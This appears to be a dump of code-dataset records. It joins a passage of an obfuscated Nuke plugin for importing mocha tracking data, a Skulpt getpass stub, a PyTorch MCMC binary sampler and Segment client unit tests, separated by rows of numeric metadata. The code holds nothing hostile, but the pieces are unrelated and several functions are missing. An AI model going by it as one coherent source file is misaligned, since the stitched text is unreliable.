    """Prompt for a mocha FBX file and create camera + point cloud nodes for it."""
    q = b.getFilename('Load from mocha FBX 6.1.0 3D Data for Nuke 6.3v7', '*.fbx')
    if q is None or not al.path.isfile(q):
        return
    if not q.lower().endswith('.fbx'):
        b.message(
            "filename must end with .fbx\nPlease choose a file exported with mocha Pro's camera module choosing the format named 'FBX 6.1.0 3D Data for Nuke 6..3v7 (*.fbx)'")
        return
    cQ(q)
    cR(q)
def cQ(q):
    """Create a Camera2 node reading the mocha camera from fbx file *q*; returns it."""
    camera = b.createNode('Camera2', 'file "%s" read_from_file True' % q)
    camera['fbx_node_name'].setValue('MochaCameraNode')
    camera['label'].setValue(gH(q))
    return camera
def cR(q):
    """Create a ReadGeo2 node rendering fbx file *q* as a point cloud; returns it."""
    geo = b.createNode('ReadGeo2', 'file "%s"' % q)
    geo['object_type'].setValue('Point Cloud')
    geo['label'].setValue('MochaImport+')
    return geo
def gI():
    """Prompt for a mocha FBX file and build the full camera rig for it."""
    q = b.getFilename('Load from mocha FBX 6.1.0 3D Data for Nuke 6.3v7', '*.fbx')
    if q is None or not al.path.isfile(q):
        return
    if not q.lower().endswith('.fbx'):
        b.message(
            "filename must end with .fbx\nPlease choose a file exported with mocha Pro's camera module choosing the format named 'FBX 6.1.0 3D Data for Nuke 6..3v7 (*.fbx)'")
        return
    eq(q)
def eq(q):
    """Build the mocha camera rig for fbx file *q*: camera, point cloud,
    Scene, ScanlineRender, TransformGeo and an 'OrientWorld' axis, wired
    together, laid out on the grid and wrapped in a backdrop.
    """
    selectedNode = False
    if b.nodesSelected():
        selectedNode = b.selectedNode()  # becomes the render's bg input below
    P = cQ(q)    # camera
    br = cR(q)   # point cloud geo
    bs = b.createNode('Scene')
    bt = b.createNode('ScanlineRender')
    aF = b.createNode('TransformGeo')
    aq = b.createNode('Axis2')  # world-orientation axis
    # wiring: axis drives both the camera and the point cloud transform
    bs.setInput(0, aF)
    bs.setInput(1, P)
    aF.setInput(0, br)
    aF.setInput(1, aq)
    P.setInput(0, aq)
    bt.setInput(1, bs)
    bt.setInput(2, P)
    aG = gA()  # grid-based layout helper
    if selectedNode:
        bt.setInput(0, selectedNode)
        aG.placeNodeRelativeToNode(P, selectedNode, 2, 0)
    aG.placeNodeRelativeToNode(bs, P, -1, 0)
    aG.placeNodeRelativeToNode(bt, P, -1, 1)
    aG.placeNodeRelativeToNode(aF, P, -1, -1)
    aG.placeNodeRelativeToNode(aq, P, 0, -1)
    aG.placeNodeRelativeToNode(br, P, -2, -1)
    br.setName('PointCloud')
    aq['label'].setValue('OrientWorld')
    br['help'].setValue(
        'renders the point cloud imported from the mocha camera track. Each tracked layer contributes 5 points (four corners + center of surface rectangle)')
    P['help'].setValue('camera imported from mocha camera track')
    aq['help'].setValue(
        'use this node to orient the camera track in your scene as desired (e.g. make the ground plane horizontal etc...)')
    aF['help'].setValue('applies your world transformations from node ' + aq.name() + ' to the point cloud')
    cU = [P, br, bs, bt, aF, aq]
    cP(P)
    # select the whole rig so gJ() wraps it in a backdrop
    for node in cU:
        node.setSelected(True)
    er = gJ()
    er['label'].setValue('camera rig')
    cU.append(er)
    for node in cU:
        node.hideControlPanel()
def gH(path):
    """Return a node label for *path*: the file's basename plus a MochaImport+ tag."""
    return al.path.basename(path) + '\nMochaImport+'
def gJ():
    """Create a MochaImport+ backdrop around the currently selected nodes.

    Falls back to an unpositioned backdrop when nothing is selected.
    Returns the backdrop node and re-selects the wrapped nodes.
    """
    aH = b.selectedNodes()
    if not aH:
        return b.nodes.BackdropNode(tile_color=int('%02x%02x%02x%02x' % (232.05, 145.095, 0, 255), 16),
                                    note_font_color=4294967040, note_font_size=36, name='MochaImport+')
    # bounding box of the selection
    cV = min([node.xpos() for node in aH])
    cW = min([node.ypos() for node in aH])
    es = max([node.xpos() + node.screenWidth() for node in aH]) - cV
    et = max([node.ypos() + node.screenHeight() for node in aH]) - cW
    # margins: left, top (extra room for the title), right, bottom
    eu, ev, gK, gL = (-10, -80, 10, 10)
    cV += eu
    cW += ev
    es += gK - eu
    et += gL - ev
    n = b.nodes.BackdropNode(xpos=cV, bdwidth=es, ypos=cW, bdheight=et,
                             tile_color=int('%02x%02x%02x%02x' % (232.05, 145.095, 0, 255), 16),
                             note_font_color=4294967040, note_font_size=36, name='MochaImport+')
    n['selected'].setValue(True)
    for node in aH:
        node['selected'].setValue(True)
    return n
import nuke as b
import os as al
def cX(cb):
    """
    recursively return all nodes starting at topLevel. Default topLevel is nuke.root()
    """
    collected = b.allNodes(group=cb)
    for child in list(collected):
        collected = collected + cX(child)
    return collected
def ew(node):
    """
    Return a dictionary of the nodes and pipes that are connected to node
    """
    connections = {}
    for downstream in node.dependent(b.INPUTS | b.HIDDEN_INPUTS):
        connections[downstream] = [i for i in range(downstream.inputs())
                                   if downstream.input(i) == node]
    return connections
def gN(node):
    """Return True when *node* is a gizmo (it exposes a 'gizmo_file' knob)."""
    knob_names = node.knobs()
    return 'gizmo_file' in knob_names
def cZ(r):
    """Check if gizmo is in default install path.

    True when Nuke's executable directory is a prefix of the gizmo's file
    path.  A dead computation (two path-component sets whose issubset()
    result was discarded) has been removed.
    """
    install_dir = al.path.dirname(b.EXE_PATH)
    gizmo_path = r.filename()
    # NOTE: os.path.commonprefix compares character-by-character, not by
    # path component; behavior kept identical to the original check.
    return al.path.commonprefix([install_dir, gizmo_path]) == install_dir
def gQ(n):
    """
    Return n's parent node; returns nuke.root() when n is on the top level.
    """
    parent_path = '.'.join(n.fullName().split('.')[:-1])
    return b.toNode(parent_path) or b.root()
def db(r):
    """
    copy gizmo to group and replace it in the tree, so all inputs and outputs use the new group.
    returns the new group node
    """
    parent = gQ(r)
    # create an empty group of the same class inside the gizmo's parent
    group_name = b.tcl(
        'global no_gizmo; set no_gizmo 1; in %s {%s -New} ; return [value [stack 0].name]' % (parent.fullName(), r.Class()))
    group = b.toNode('.'.join((parent.fullName(), group_name)))
    group.setSelected(False)
    # reconnect every downstream node that read from the gizmo.
    # ew() is computed once (it was previously called twice); .items()
    # behaves identically to the former .iteritems() on Python 2 and
    # also works on Python 3.
    for node, input_indices in ew(r).items():
        for i in input_indices:
            node.setInput(i, group)
    for i in range(r.inputs()):
        group.setInput(i, r.input(i))
    group.setXYpos(r.xpos(), r.ypos())
    group.readKnobs(r.writeKnobs(b.TO_SCRIPT))
    b.delete(r)
    return group
def ho(cb=None, gT=False):
    """Convert gizmos under group *cb* (default: the current root) into groups.

    The former signature used ``cb=b.root()``, which evaluated the root
    once at import time; a None sentinel now resolves it per call.
    Gizmos in Nuke's default install path are converted only when *gT*
    is False.
    """
    if cb is None:
        cb = b.root()
    for n in cX(cb):
        n.setSelected(False)
    for n in cX(cb):
        try:
            if gN(n):
                if not cZ(n):
                    db(n)
                elif not gT:
                    db(n)
        except ValueError:
            pass  # best-effort: skip nodes that cannot be inspected/converted
def gU(r):
    """Convert corner pin gizmo *r* to a group, preserving name and color."""
    return dc(r)


def gV(gW):
    """Convert StartStabilized gizmo *gW* to a group, preserving name and color."""
    return dc(gW)


def gX(gY):
    """Convert EndStabilized gizmo *gY* to a group, preserving name and color."""
    return dc(gY)
def dc(r):
    """Replace gizmo *r* with an equivalent group, keeping its name and tile color."""
    for other in b.allNodes():
        other.knob('selected').setValue(False)
    original_name = r.knob('name').value()
    original_color = r.knob('tile_color').value()
    group = db(r)
    group.knob('name').setValue(original_name)
    group.knob('tile_color').setValue(original_color)
    return group
# When True (the default), gizmo nodes created by MochaImport+ are converted
# to groups so scripts stay portable; setUseGizmos() toggles this flag.
cc = True
class MiUnsupportedNodeTypeError(Exception):
    """Raised when mocha tracking data is applied to an unsupported node type."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return repr(self.value)
def createStabilizedView():
    """Creates a Stabilized View Rig
    :returns: nothing
    """
    global cc
    y = b.createNode('StartStabilized')
    dd = b.createNode('Dot', '', False)
    de = b.createNode('Dot', '', False)
    w = b.createNode('EndStabilized')
    if cc:
        # convert the gizmos to groups for script portability
        y = gV(y)
        w = gX(w)
    y['tile_color'].setValue(int('%02x%02x%02x%02x' % (232.05, 145.095, 0, 255), 16))
    w['tile_color'].setValue(int('%02x%02x%02x%02x' % (232.05, 145.095, 0, 255), 16))
    w.connectInput(2, y)
    # EndStabilized mirrors StartStabilized's pin knobs via expressions
    stabilizedPrecompNode___connectPrecompNodes(y, w)
    cd = 250  # horizontal backdrop extent (pixels)
    df = 250  # vertical distance between start and end nodes
    ez = 50   # vertical backdrop margin
    eA = 7    # small y offset for the dots
    cP(dd)
    de.setSelected(True)
    eB = b.nodes.BackdropNode(xpos=y.xpos() + cd / 2, bdwidth=cd * 1.5, ypos=y.ypos() - ez, bdheight=df + 2 * ez,
                              tile_color=int('%02x%02x%02x%02x' % (232.05, 145.095, 0, 255), 16),
                              note_font_color=4294967040, note_font_size=36, name='MochaImport+')
    eB['label'].setValue('Stabilized View+')
    # lay out the two dots on the right edge and the end node below the start
    dd.setXpos(y.xpos() + cd)
    dd.setYpos(y.ypos() + eA)
    de.setXpos(y.xpos() + cd)
    de.setYpos(y.ypos() + df + eA)
    w.setXpos(y.xpos())
    w.setYpos(y.ypos() + df)
    eB['help'].setValue(
        "\n<h2>Basic Usage of Stabilized View Rig</h2>\n<ol>\n<li>From the MochaImport+ menu, create the stabilized view rig consisting of the StartStabilized node, the EndStabilized node, and the Stabilized View Backdrop.</li>\n<li>Load your mocha tracking data in the StartStabilized node.\n</li><li>Do arbitrary manipulations in the Stabilized View by inserting new nodes inside the backdrop. All changes you do there in a stabilized setting will also be visible in your original perspective after the EndStabilized node.</li>\n</ol>\n\n<h2>Lens Distortion</h2>\n<p>If you've used the mocha Lens module to analyze the lens distortion of your clip, you need to do the following things to get an undistorted stabilized view and reapply the lens distortion to the final result:\n</p><ul>\n<li>make sure the mocha corner pin data you load into the StartStabilized node is exported from mocha Pro with the option 'Remove lens distortion'</li>\n<li>as UndistMap input of the StartStabilized node use a Distortion Map Clip (ST Map) exported with the mocha Pro lens module with option 'undistort'.</li>\n<li>as DistMap input of the EndStabilized node use a Distortion Map Clip (ST Map) exported with the mocha Pro lens module with option 'distort'.</li>\n</ul>".replace(
            '\n', '').replace('\r', ''))
def createCornerPin():
    """Creates a CornerPin with Lens Distortion node
    By default, a CornerPin with Lens Distortion is a group node. If mochaimport___setUseGizmos(True) has been called before,
    it will be a gizmo instead of a group.
    :returns: the created node
    """
    node = b.createNode('CornerPinMI')
    node['tile_color'].setValue(int('%02x%02x%02x%02x' % (232.05, 145.095, 0, 255), 16))
    if cc:
        node = gU(node)
    return node
def createTracker3Node():
    """Creates a Tracker+ (old) node
    A Tracker+ (old) node is a Tracker3 node that is extended with the ability to load mocha tracking data
    :returns: the created node
    """
    return fQ()
def createTracker4Node():
    """Creates a Tracker+ node
    A Tracker+ node is a Tracker4 node that is extended with the ability to load mocha tracking data
    :returns: the created node
    """
    return fR()
def createTransformNodeMI():
    """Creates a Transform+ node
    A Transform+ node is a Transform node that is extended with the ability to load mocha tracking data
    :returns: whatever gj() returns (for parity with the other create* helpers)
    """
    return gj()
def createRotoPaintNodeMI():
    """Creates a RotoPaint+ node
    A RotoPaint+ node is a RotoPaint node that is extended with the ability to load mocha tracking data
    :returns: the created node
    """
    return gr()


def createRotoNodeMI():
    """Creates a Roto+ node
    A Roto+ node is a Roto node that is extended with the ability to load mocha tracking data
    :returns: the created node
    """
    return gs()


def createGridWarpNodeMI():
    """Creates a GridWarp+ node
    A GridWarp+ node is a GridWarp3 node that is extended with the ability to load mocha tracking data
    :returns: the created node
    """
    return gy()


def createSplineWarpNodeMI():
    """Creates a SplineWarp+ node
    A SplineWarp+ node is a SplineWarp3 node that is extended with the ability to load mocha tracking data
    :returns: the created node
    """
    return gt()
def createCameraAndPointCloud(mochaFbxFilePath=None):
    """Creates a camera node and a point cloud node for a fbx file exported from mocha
    The function sets all options of the two nodes to interpret the fbx file from mocha properly.
    If None is given as mochaFbxFilePath, the function shows a open file dialog to choose an fbx file.
    """
    if mochaFbxFilePath is None:
        gG()
        return
    cQ(mochaFbxFilePath)
    cR(mochaFbxFilePath)
def createCameraRig(mochaFbxFilePath=None):
    """Creates a mocha camera rig for a fbx file exported from mocha
    If None is given as mochaFbxFilePath, the function shows a open file dialog to choose an fbx file
    """
    if mochaFbxFilePath is None:
        gI()
        return
    eq(mochaFbxFilePath)
def hp():
    # Delegates to dp() (defined elsewhere in the file) with this product's
    # name, identifier and numeric id -- presumably an update/registration
    # check with mamoworld; confirm against dp's definition.
    return dp('MochaImport+', 'mochaimportnuke', '743985')
def showSettings():
    """Shows the settings dialog of MochaImport+"""
    cq = dz()  # dz() builds the settings dialog object (defined elsewhere)
    cq.abag()  # NOTE(review): presumably displays the dialog -- obfuscated name, confirm
def setUseGizmos(value=True):
    """Force MochaImport+ to use gizmos instead of groups for stabilized views and corner pins.
    Note that this breaks compatibility with machines where MochaImport+ is not installed.
    """
    global cc
    # cc is the "convert gizmos to groups" flag, so using gizmos means clearing it
    cc = not value
def applyMochaDataToNode(node, cornerpinData, referenceFrame=1, layerIndex=0):
    """Applies mocha cornerpin data to a node
    the node can have any of the node types supported by MochaImport+.
    :param node: the node to which the mocha tracking data should be applied
    :param cornerpinData: mocha corner pin data represented as a string
    :param referenceFrame: at which frame the moved object should be unchanged (only for the node types that have this control in their MochaImport+ tab)
    :param layerIndex: to which layer of the node the trackingdata is applied (optional, only for Roto, RotoPaint and SplineWarp nodes)
    :raises MiUnsupportedNodeTypeError: for node classes outside the supported list
    """
    # node classes this dispatcher can drive
    hc = [
        'Transform', 'Tracker3', 'Tracker4', 'Group', 'GridWarp3', 'SplineWarp3', 'Roto', 'RotoPaint', 'CornerPinMI',
        'StartStabilized']
    if node.Class() not in hc:
        raise MiUnsupportedNodeTypeError('cannot apply mocha tracking data to node of class: ' + node.Class())
    # generic groups are only supported when they expose the four pin knobs
    if node.Class() == 'Group' and (
            node.knob('pin1') == None or node.knob('pin2') == None or node.knob(
        'pin3') == None or node.knob(
        'pin4') == None):
        raise MiUnsupportedNodeTypeError(
            "Can only apply tracking data to groups, if they have the knobs 'pin1', 'pin2', 'pin3' and 'pin4'")
    d = bz(cornerpinData)  # parse the corner pin string into a data object
    # dispatch per node class to the matching writer
    if node.Class() == 'Transform':
        u = bV(d)  # convert corner pin data to transform components
        cH(node, u)
    elif node.Class() == 'Tracker3':
        cx(node, d)
    elif node.Class() == 'Tracker4':
        cA(node, d)
    elif node.Class() in ('Group', 'CornerPinMI', 'StartStabilized'):
        dg(d, node['pin1'], node['pin2'], node['pin3'], node['pin4'])
    elif node.Class() == 'GridWarp3':
        bp = cu(d, referenceFrame)
        bp.applyToArrayKnob(node['source_grid_transform_matrix'])
    elif node.Class() in ('SplineWarp3', 'Roto', 'RotoPaint'):
        cM(node, d, layerIndex, referenceFrame)
    return
def hq():
    """Build a 'corner pin MI' group: a CornerPin2D plus an (initially
    disabled) STMap lens-distortion stage, collapsed into a group whose
    pin knobs drive the corner pin 'to' points by expression (with a
    pinTimeOffset)."""
    eC = 'corner pin'
    hd = 'apply distortion'
    he = 'distortion map'
    i = b.nodes.CornerPin2D(name=eC)
    ce = b.nodes.STMap(name=hd, disable=True)
    eD = b.nodes.Read(name=he)
    if b.nodesSelected():
        # insert the rig downstream of the current selection
        eE = b.selectedNode()
        fJ(eE, ce)
        i.setInput(0, eE)
    ce.setInput(0, i)
    ce.setInput(1, eD)
    cP(i)
    ce.setSelected(True)
    eD.setSelected(True)
    aI = b.collapseToGroup()  # wrap the three selected nodes in a group
    aI.setName('corner pin MI')
    i = aI.node(eC)  # re-resolve the corner pin inside the new group
    eM(aI)
    aI.addKnob(b.Text_Knob('divName', '', ''))
    eN(i, aI)
    # drive the corner pin 'to' points from the group-level pin knobs,
    # shifted by the group's pinTimeOffset
    i['to1'].setExpression('parent.pin1.x(t+parent.pinTimeOffset)', 0)
    i['to1'].setExpression('parent.pin1.y(t+parent.pinTimeOffset)', 1)
    i['to2'].setExpression('parent.pin2.x(t+parent.pinTimeOffset)', 0)
    i['to2'].setExpression('parent.pin2.y(t+parent.pinTimeOffset)', 1)
    i['to3'].setExpression('parent.pin3.x(t+parent.pinTimeOffset)', 0)
    i['to3'].setExpression('parent.pin3.y(t+parent.pinTimeOffset)', 1)
    i['to4'].setExpression('parent.pin4.x(t+parent.pinTimeOffset)', 0)
    i['to4'].setExpression('parent.pin4.y(t+parent.pinTimeOffset)', 1)
    fK(aI)
| 206.376296
| 63,435
| 0.877122
| 20,800
| 417,912
| 17.606875
| 0.459471
| 0.001229
| 0.001425
| 0.000601
| 0.07505
| 0.065231
| 0.061037
| 0.053033
| 0.048334
| 0.046286
| 0
| 0.081809
| 0.042844
| 417,912
| 2,024
| 63,436
| 206.478261
| 0.833733
| 0.000352
| 0
| 0.282152
| 0
| 0.035433
| 0.882903
| 0.857663
| 0
| 1
| 0
| 0
| 0.004593
| 0
| null | null | 0.001312
| 0.055118
| null | null | 0.003281
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5ee28d90df22e59c0bffffb33f424e6b583f751a
| 39
|
py
|
Python
|
src/lib/getpass.py
|
DTenore/skulpt
|
098d20acfb088d6db85535132c324b7ac2f2d212
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
src/lib/getpass.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
src/lib/getpass.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
import _sk_fail; _sk_fail._("getpass")
| 19.5
| 38
| 0.769231
| 6
| 39
| 4.166667
| 0.666667
| 0.48
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 39
| 1
| 39
| 39
| 0.694444
| 0
| 0
| 0
| 0
| 0
| 0.179487
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
6f0bd92ea44bbc9f15ce7ddb2215e5b1bde4616e
| 6,267
|
py
|
Python
|
PAS/debm/sampling/nb_sampler.py
|
ha0ransun/Path-Auxiliary-Sampler
|
a93912beda8e264f04704180e505a1b333f227c8
|
[
"MIT"
] | 2
|
2022-03-15T09:08:56.000Z
|
2022-03-19T08:19:06.000Z
|
PAS/debm/sampling/nb_sampler.py
|
ha0ransun/Path-Auxiliary-Sampler
|
a93912beda8e264f04704180e505a1b333f227c8
|
[
"MIT"
] | null | null | null |
PAS/debm/sampling/nb_sampler.py
|
ha0ransun/Path-Auxiliary-Sampler
|
a93912beda8e264f04704180e505a1b333f227c8
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
class NBSampler(nn.Module):
    def __init__(self, R):
        # R: radius bound -- per step the number of bit flips is drawn
        # from [1, 2R) (see step()).
        print('our binary sampler')  # NOTE(review): looks like a leftover debug print
        super().__init__()
        self.R_list = []  # history of sampled radii, one tensor per step
        self.R = R
        self.count = 0  # bookkeeping counters -- updated outside this view; confirm
        self.succ = 0
def step(self, x, model):
bsize = x.shape[0]
x_rank = len(x.shape) - 1
radius = torch.randint(1, self.R * 2, size=(bsize, 1))
self.R_list.append(radius)
max_r = torch.max(radius).item()
r_mask = torch.arange(max_r).expand(bsize, max_r) < radius
r_mask = r_mask.float().to(x.device)
x = x.requires_grad_()
score_x = model(x)
grad_x = torch.autograd.grad(score_x.sum(), x)[0].detach()
b_idx = torch.arange(bsize).to(x.device)
with torch.no_grad():
cur_x = x.clone()
idx_list = []
delta_x = -(2.0 * cur_x - 1.0)
score_change_x = delta_x * grad_x / 2.0
prob_x = torch.softmax(score_change_x, dim=-1)
for step in range(max_r):
index = torch.multinomial(prob_x, 1).view(-1)
cur_bits = cur_x[b_idx, index]
new_bits = 1.0 - cur_bits
cur_r_mask = r_mask[:, step]
cur_x[b_idx, index] = cur_r_mask * new_bits + (1.0 - cur_r_mask) * cur_bits
prob_x[b_idx, index] = 0
idx_list.append(index)
y = cur_x
y = y.requires_grad_()
score_y = model(y)
grad_y = torch.autograd.grad(score_y.sum(), y)[0].detach()
with torch.no_grad():
r_idx = torch.arange(max_r).to(x.device).view(1, -1)
idx_all = torch.stack(idx_list, dim=1) # bsize x max_r
# fwd from x -> y
change_fwd = score_change_x.unsqueeze(1).repeat(1, max_r, 1)
for i, idx in enumerate(idx_list):
for j in range(i + 1, max_r):
change_fwd[b_idx, torch.LongTensor([j] * bsize).to(x.device), idx] = -float('inf')
log_fwd = torch.log_softmax(change_fwd, dim=-1)
log_fwd = torch.sum(log_fwd[b_idx.view(-1, 1), r_idx, idx_all] * r_mask, dim=-1) + score_x.view(-1)
# backwd from y -> x
delta_y = -(2.0 * y - 1.0)
score_change_y = delta_y * grad_y / 2.0
change_bwd = score_change_y.unsqueeze(1).repeat(1, max_r, 1)
for i, idx in enumerate(idx_list):
for j in range(i):
change_bwd[b_idx, torch.LongTensor([j] * bsize).to(x.device), idx] = -float('inf')
log_bwd = torch.log_softmax(change_bwd, dim=-1)
log_bwd = torch.sum(log_bwd[b_idx.view(-1,1), r_idx, idx_all] * r_mask, dim=-1) + score_y.view(-1)
log_acc = log_bwd - log_fwd
accepted = (log_acc.exp() >= torch.rand_like(log_acc)).float().view(-1, *([1] * x_rank))
new_x = y * accepted + (1.0 - accepted) * x
self.count += bsize
self.succ += accepted.sum()
return new_x
@property
def avgR(self):
return torch.stack(self.R_list, dim=-1).float().mean().item()
class NBASampler(nn.Module):
    """Adaptive-radius variant of the non-backtracking binary sampler.

    Identical proposal/accept machinery to ``NBSampler``, except the flip
    radius is not drawn from a fixed range: it is set per batch element to
    the number of bits whose proposal probability exceeds 0.02, plus one.
    """

    def __init__(self):
        print('our binary sampler')
        super().__init__()
        self.R_list = []  # per-step adaptive radii, for avgR diagnostics
        self.count = 0    # total proposals made (counted per batch element)
        self.succ = 0     # accepted proposals (accumulated as a tensor sum)

    def step(self, x, model):
        # NOTE(review): x is assumed to be a {0,1}-valued float tensor of
        # shape (bsize, dim) -- torch.multinomial requires a 2-D prob_x and
        # cur_x[b_idx, index] indexes one bit per row. TODO confirm.
        bsize = x.shape[0]
        x_rank = len(x.shape) - 1
        x = x.requires_grad_()
        score_x = model(x)
        grad_x = torch.autograd.grad(score_x.sum(), x)[0].detach()
        b_idx = torch.arange(bsize).to(x.device)
        with torch.no_grad():
            cur_x = x.clone()
            idx_list = []
            # Gradient-based estimate of the score change from flipping
            # each bit (delta is +1 on zeros, -1 on ones).
            delta_x = -(2.0 * cur_x - 1.0)
            score_change_x = delta_x * grad_x / 2.0
            prob_x = torch.softmax(score_change_x, dim=-1)
            # Adaptive radius: count "promising" bits (prob > 0.02) + 1.
            radius = (prob_x > 0.02).sum(dim=1, keepdim=True) + 1
            self.R_list.append(radius)
            max_r = torch.max(radius).item()
            # r_mask[b, t] == 1 iff flip-step t is active for element b.
            r_mask = torch.arange(max_r).to(x.device).expand(bsize, max_r) < radius
            r_mask = r_mask.float().to(x.device)
            for step in range(max_r):
                # Sample one bit per row without replacement; inactive
                # steps keep the old bit value.
                index = torch.multinomial(prob_x, 1).view(-1)
                cur_bits = cur_x[b_idx, index]
                new_bits = 1.0 - cur_bits
                cur_r_mask = r_mask[:, step]
                cur_x[b_idx, index] = cur_r_mask * new_bits + (1.0 - cur_r_mask) * cur_bits
                prob_x[b_idx, index] = 0
                idx_list.append(index)
        y = cur_x
        y = y.requires_grad_()
        score_y = model(y)
        grad_y = torch.autograd.grad(score_y.sum(), y)[0].detach()
        with torch.no_grad():
            r_idx = torch.arange(max_r).to(x.device).view(1, -1)
            idx_all = torch.stack(idx_list, dim=1)  # bsize x max_r
            # fwd from x -> y: log-prob of the proposed index sequence;
            # earlier-chosen indices are masked to -inf for later steps.
            change_fwd = score_change_x.unsqueeze(1).repeat(1, max_r, 1)
            for i, idx in enumerate(idx_list):
                for j in range(i + 1, max_r):
                    change_fwd[b_idx, torch.LongTensor([j] * bsize).to(x.device), idx] = -float('inf')
            log_fwd = torch.log_softmax(change_fwd, dim=-1)
            log_fwd = torch.sum(log_fwd[b_idx.view(-1, 1), r_idx, idx_all] * r_mask, dim=-1) + score_x.view(-1)
            # backwd from y -> x: reverse-sequence proposal probability.
            delta_y = -(2.0 * y - 1.0)
            score_change_y = delta_y * grad_y / 2.0
            change_bwd = score_change_y.unsqueeze(1).repeat(1, max_r, 1)
            for i, idx in enumerate(idx_list):
                for j in range(i):
                    change_bwd[b_idx, torch.LongTensor([j] * bsize).to(x.device), idx] = -float('inf')
            log_bwd = torch.log_softmax(change_bwd, dim=-1)
            log_bwd = torch.sum(log_bwd[b_idx.view(-1,1), r_idx, idx_all] * r_mask, dim=-1) + score_y.view(-1)
            # MH acceptance on the whole batched move.
            log_acc = log_bwd - log_fwd
            accepted = (log_acc.exp() >= torch.rand_like(log_acc)).float().view(-1, *([1] * x_rank))
            new_x = y * accepted + (1.0 - accepted) * x
            self.count += bsize
            self.succ += accepted.sum()
        return new_x

    @property
    def avgR(self):
        # Mean adaptive radius over all steps so far (diagnostic).
        return torch.stack(self.R_list, dim=-1).float().mean().item()
| 40.960784
| 111
| 0.532631
| 957
| 6,267
| 3.240334
| 0.098224
| 0.023218
| 0.031925
| 0.027088
| 0.959368
| 0.947114
| 0.947114
| 0.944212
| 0.944212
| 0.944212
| 0
| 0.026042
| 0.325993
| 6,267
| 152
| 112
| 41.230263
| 0.708097
| 0.015478
| 0
| 0.914729
| 0
| 0
| 0.007788
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0
| 0.015504
| 0.015504
| 0.108527
| 0.015504
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f28aa8519caf6e9374ace560d79027c5dd8933b
| 9,469
|
py
|
Python
|
segmentio/test/client.py
|
enderlabs/segment-python
|
ae918efba9be3a148b1a9ac1795f017a72b164b8
|
[
"Unlicense",
"MIT"
] | null | null | null |
segmentio/test/client.py
|
enderlabs/segment-python
|
ae918efba9be3a148b1a9ac1795f017a72b164b8
|
[
"Unlicense",
"MIT"
] | null | null | null |
segmentio/test/client.py
|
enderlabs/segment-python
|
ae918efba9be3a148b1a9ac1795f017a72b164b8
|
[
"Unlicense",
"MIT"
] | null | null | null |
from datetime import datetime
import unittest
import time
import six
from segmentio.version import VERSION
from segmentio.client import Client
class TestClient(unittest.TestCase):
    """Integration tests for ``segmentio.client.Client``.

    Each message-producing test checks both the returned success flag and
    the queued message payload; ``self.failed`` records whether the
    client's ``on_error`` callback fired.
    """

    def record_error(self, e, batch):
        """``on_error`` callback: record that an upload failed.

        Fix: this handler was previously named ``fail``, shadowing
        ``unittest.TestCase.fail(msg=None)`` with an incompatible
        signature -- any framework-internal ``self.fail(msg)`` call
        (e.g. from a failing assertion helper) would have raised
        ``TypeError`` instead of reporting the failure.
        """
        self.failed = True

    def setUp(self):
        self.failed = False
        self.client = Client('testsecret', on_error=self.record_error)

    def test_requires_write_key(self):
        # A client cannot be constructed without a write key.
        self.assertRaises(AssertionError, Client)

    def test_empty_flush(self):
        # Flushing an empty queue must not raise.
        self.client.flush()

    def test_basic_track(self):
        client = self.client
        success, msg = client.track('userId', 'python test event')
        client.flush()
        self.assertTrue(success)
        self.assertFalse(self.failed)
        self.assertEqual(msg['event'], 'python test event')
        self.assertTrue(isinstance(msg['timestamp'], str))
        self.assertTrue(isinstance(msg['messageId'], str))
        self.assertEqual(msg['userId'], 'userId')
        self.assertEqual(msg['properties'], {})
        self.assertEqual(msg['type'], 'track')

    def test_advanced_track(self):
        client = self.client
        success, msg = client.track(
            'userId', 'python test event', { 'property': 'value' },
            { 'ip': '192.168.0.1' }, datetime(2014, 9, 3), 'anonymousId',
            { 'Amplitude': True })
        self.assertTrue(success)
        self.assertEqual(msg['timestamp'], '2014-09-03T00:00:00+00:00')
        self.assertEqual(msg['properties'], { 'property': 'value' })
        self.assertEqual(msg['integrations'], { 'Amplitude': True })
        self.assertEqual(msg['context']['ip'], '192.168.0.1')
        self.assertEqual(msg['event'], 'python test event')
        self.assertEqual(msg['anonymousId'], 'anonymousId')
        self.assertEqual(msg['context']['library'], {
            'name': 'analytics-python',
            'version': VERSION
        })
        self.assertTrue(isinstance(msg['messageId'], str))
        self.assertEqual(msg['userId'], 'userId')
        self.assertEqual(msg['type'], 'track')

    def test_basic_identify(self):
        client = self.client
        success, msg = client.identify('userId', { 'trait': 'value' })
        client.flush()
        self.assertTrue(success)
        self.assertFalse(self.failed)
        self.assertEqual(msg['traits'], { 'trait': 'value' })
        self.assertTrue(isinstance(msg['timestamp'], str))
